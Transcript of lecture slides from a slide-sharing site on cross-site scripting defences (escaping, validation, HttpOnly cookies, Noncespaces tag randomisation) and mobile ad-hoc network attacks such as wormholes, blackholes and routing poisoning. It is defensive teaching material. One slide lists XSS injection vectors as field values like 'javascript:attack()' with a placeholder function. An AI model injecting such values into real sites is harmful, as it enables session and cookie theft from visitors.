This Material Will Not be In Final Exam. Cross-Site Scripting (XSS)

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

1 Security for Ad Hoc Network Routing. 2 Ad Hoc Networks Properties Mobile Wireless communication Medium to high bandwidth High variability of connection.
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009
Chris Karlof and David Wagner
Jason Li Jeremy Fowers. Background Information Wireless sensor network characteristics General sensor network security mechanisms DoS attacks and defenses.
Computer Science Dr. Peng NingCSC 774 Adv. Net. Security1 CSC 774 Advanced Network Security Topic 6. Security in Mobile Ad-Hoc Networks.
Click to continue Network Protocols. Click to continue Networking Protocols A protocol defines the rules of procedures, which computers must obey when.
A Survey of Secure Wireless Ad Hoc Routing
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Lecture 9 Page 1 CS 236 Online Denial of Service Attacks that prevent legitimate users from doing their work By flooding the network Or corrupting routing.
Packet Leashes: Defense Against Wormhole Attacks Authors: Yih-Chun Hu (CMU), Adrian Perrig (CMU), David Johnson (Rice)
Security Improvement for Ad Hoc Wireless Network Visal Kith ECE /05/2006.
MANETs Routing Dr. Raad S. Al-Qassas Department of Computer Science PSUT
Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
1 Spring Semester 2007, Dept. of Computer Science, Technion Internet Networking recitation #4 Mobile Ad-Hoc Networks AODV Routing.
Yih-Chun Hu Carnegie Mellon University
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Centre for Wireless Communications University of Oulu, Finland
Routing Security in Ad Hoc Networks
Security Risks for Ad Hoc Networks and how they can be alleviated By: Jones Olaiya Ogunduyilemi Supervisor: Jens Christian Godskesen © Dec
Mobile and Wireless Computing Institute for Computer Science, University of Freiburg Western Australian Interactive Virtual Environments Centre (IVEC)
1 Chapter 13: Representing Identity What is identity Different contexts, environments Pseudonymity and anonymity.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Ad Hoc Wireless Routing COS 461: Computer Networks
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Network-layer Security of Mobile Ad hoc Networks Jiangyi Hu Advisor: Dr. Mike Burmester.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
Prevent Cross-Site Scripting (XSS) attack
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
2013Dr. Ali Rodan 1 Handout 1 Fundamentals of the Internet.
MOBILE AD-HOC NETWORK(MANET) SECURITY VAMSI KRISHNA KANURI NAGA SWETHA DASARI RESHMA ARAVAPALLI.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
1 Semester 2 Module 10 Intermediate TCP/IP Yuda college of business James Chen
1 Spring Semester 2009, Dept. of Computer Science, Technion Internet Networking recitation #3 Mobile Ad-Hoc Networks AODV Routing.
WS-Security: SOAP Message Security Web-enhanced Information Management (WHIM) Justin R. Wang Professor Kaiser.
A survey of Routing Attacks in Mobile Ad Hoc Networks Bounpadith Kannhavong, Hidehisa Nakayama, Yoshiaki Nemoto, Nei Kato, and Abbas Jamalipour Presented.
FIREWALLS Vivek Srinivasan. Contents Introduction Need for firewalls Different types of firewalls Conclusion.
Security+ Guide to Network Security Fundamentals, Fourth Edition
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
Lecture 20 Hacking. Over the Internet Over LAN Locally Offline Theft Deception Modes of Hacker Attack.
Authors: Yih-Chun Hu, Adrian Perrig, David B. Johnson
1 Detecting and Evading Wormholes in Mobile Ad-hoc Wireless Networks Asad Amir Pirzada and Chris McDonald.
Rushing Attacks and Defense in Wireless Ad Hoc Network Routing Protocols ► Acts as denial of service by disrupting the flow of data between a source and.
Security in Ad Hoc Networks. What is an Ad hoc network? “…a collection of wireless mobile hosts forming a temporary network without the aid of any established.
CIS 450 – Network Security Chapter 4 - Spoofing. Definition - To fool. In networking, the term is used to describe a variety of ways in which hardware.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
DSR: Introduction Reference: D. B. Johnson, D. A. Maltz, Y.-C. Hu, and J. G. Jetcheva, “The Dynamic Source Routing Protocol for Mobile Ad Hoc Networks,”
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
Web Services. 2 Internet Collection of physically interconnected computers. Messages decomposed into packets. Packets transmitted from source to destination.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
TCP/IP1 Address Resolution Protocol Internet uses IP address to recognize a computer. But IP address needs to be translated to physical address (NIC).
Carrie Estes Collin Donaldson.  Zero day attacks  “zero day”  Web application attacks  Signing up for a class  Hardening the web server  Enhancing.
Mobile Ad Hoc Networking By Shaena Price. What is it? Autonomous system of routers and hosts connected by wireless links Can work flawlessly in a standalone.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
SESSION HIJACKING It is a method of taking over a secure/unsecure Web user session by secretly obtaining the session ID and masquerading as an authorized.
CSCE 548 Student Presentation Ryan Labrador
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
WWW and HTTP King Fahd University of Petroleum & Minerals
CS 371 Web Application Programming
Packet Leashes: Defense Against Wormhole Attacks
Anonymous Communication
Network Security: DNS Spoofing, SQL Injection, ARP Poisoning
Anonymous Communication
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Exploring DOM-Based Cross Site Attacks
Anonymous Communication
Presentation transcript:

This Material Will Not be In Final Exam

Cross-Site Scripting (XSS)

What is XSS? A vulnerability in Web applications that lets attackers inject client-side scripts into third-party Web pages Browsers of other visitors of compromised Web page run the script – expose any data browser handles Popularity of these exploits grows and has surpassed buffer overflow exploits

Non-persistent XSS Vulnerability Web server does not properly sanitize user input but uses it as is to generate a dynamic reply (Web page) – This reply contains attackers script code Attacker can craft the URL with his script embedded in it – URL points to the target site, supplies some input + script – Entice user to click on URL – Script will steal some user info that user shares with the site, e.g. a cookie

Example Attacker User Google 1. Click here: …. 2. Send in HTTP GET as argument to Google homepage: something …. 3. Attackers script executes with Googles privs

Persistent XSS Vulnerability Data provided by attacker is stored by server and displayed to any future user – E.g. when posts to online message boards are not properly sanitized Such a script can access any content the compromised server can

Where Do Vulnerabilities Occur In server code that processes user input and dynamically renders the resulting page In client code that runs in browser and renders Web pages with data from the server – JavaScript mostly – Document Object Model (DOM) – standard model for representing HTML and XML content

Defense: Escape User Input Ensure that characters of input are treated as data, not as code – Translate any dangerous characters into another form of the same characters that cannot be interpreted as code – E.g., translate < into < Some input could be encoded into different charset – Enforce charset in each server reply so that interpretation of users input is fixed

Defense: Validate User Input Some Web sites want to allow users to input and render HTML – E.g., use HTML markup in s and online posts – Escaping doesnt help here since it would destroy HTML markup – User input must pass through the HTML policy engine to ensure it does not contain XSS

Defense: Cookie Security Because XSS can be used to steal cookies, sites cannot rely only on cookies for authentication – Tie cookies to specific IPs – HTTP Only flag in browsers allows access to cookies from HTML documents only (scripts cannot access them)

Defense: Disabling Scripts Browser-side defense – Makes some Web pages not render – Could be turned off for some sites which are trusted to be well secured against XSS

XML Randomization XSS Defense Web application randomizes XML tag prefixes before delivering a document to client – Hard for attacker to predict randomized prefixes – Cannot inject scripts into application input Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), 2009.

Insertion Vectors Tag body – review.text = attack() Node splitting – review.text = attack() Attribute value – review.contact = javascript:attack() Attribute splitting – review.contact = onclick=javascript:attack() Tag splitting – review.contact = > attack() Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), 2009.

Tag Prefix Randomization XML namespaces – User chooses a prefix for a tag – E.g. for tag: Leverage XML prefixes to annotate document with trust classes – Label of each trust class random and hard to guess by attacker Prefixes randomly chosen on each document delivery Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), 2009.

Example From Paper Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), Attack code

Trust Policy Defines tags that are trusted Defines HTML tags and operations that are allowed in untrusted content Everything else is denied Server delivers both the potentially hazardous content and the trust policy Client browser enforces policy on server-delivered content Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), 2009.

Deployment Both client and server need to be modified Easy add-on to existing software Client proxy can protect multiple clients in a network Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), 2009.

MANET Security

What Is MANET? Mobile Ad-Hoc Network – Wireless nodes – Changing topology – Possibly no trusted authority – Usually battery operated with limited CPU/memory

Security Challenges Wireless medium – Sniffing and jamming are easy, impersonation too Peers as routers – No trust in routers, may sniff, drop or fabricate data Changing topology – Routes are learned, can be manipulated by attackers No trust infrastructure or trusted entities – How to distribute keys Limited resources – Algorithms must be simple and cheap

Physical/Link Layer Attacks Sniffing: attackers can easily pick up wireless transmissions because they are broadcast at specific frequency (MAC spoofing possible too) – Frequency hopping – Directional antennas – Encryption Jamming is easy – But attacker needs powerful transmitter – Directional antennas MAC protocol misuse to monopolize shared medium – How to create a distributed protocol that detects and penalizes misbehavior?

Ad-Hoc Routing Routes are learned when needed (due to mobility) Dynamic Source Routing (DSR) – Source puts entire route in packet header Route discovery – Request messages broadcast – Intermediate nodes add themselves to the message – Reply unicast to the source with full path recorded – Nodes can cache overheard routes and may reply from cache – Link breakage results in error messages that delete routes in the network that use the broken link

Ad-Hoc Routing Ad-hoc On-Demand Distance Vector Routing – Source just specifies destination – Routers on path forward as they see fit Route discovery – Request messages broadcast – Intermediate nodes repeat the message, cache next hop to the source – Reply unicast to the source, intermediate nodes cache next hop to the destination – Intermediate node may reply from cache – When link breaks intermediate node may attempt to rediscover new route – Error messages remove routes that used the broken link

Routing Attacks Routing message flooding (DoS) Routing table overflow – Fill with bogus routes Routing cache poisoning is easy – Just fabricate requests or replies with spoofed source Fabricate false error messages

Network Layer Attacks Drop packets, modify them or replay them Delay packets Inject junk traffic Wormhole Attack – Tunnel packets to another location Blackhole Attack – Make the node part of many routes – Drop all traffic

Wormhole Attacks Attacker records traffic at one point in MANET, tunnels it (perhaps selectively) to another point and replays it Replayed traffic can arrive sooner than original traffic – This leads to an attacker node becoming part of many routes Attack works even for traffic not going over attacker nodes directly, and for encrypted traffic Wormhole attacks in wireless networks, Yih-chun Hu, Adrian Perrig, David B. Johnson, IEEE Journal on Selected Areas in Communications, 2006

Detection of Wormhole Attacks Packet leash – Information added to the packet to restrict the distance it can travel in one hop – Geographical – recipient must be close to sender. Sender records its location and time when packet is sent, recipient checks for validity. – Temporal – packet lifetime ends after certain time. Sender records the time when packet is sent, recipient checks for validity. Requires synchronized clocks Recorded information must be signed Wormhole attacks in wireless networks, Yih-chun Hu, Adrian Perrig, David B. Johnson, IEEE Journal on Selected Areas in Communications, 2006

DoS Attacks Consume node battery, CPU or memory Overflow nodes routing table Flood the node with routing messages Flood the node with data traffic Drop nodes data traffic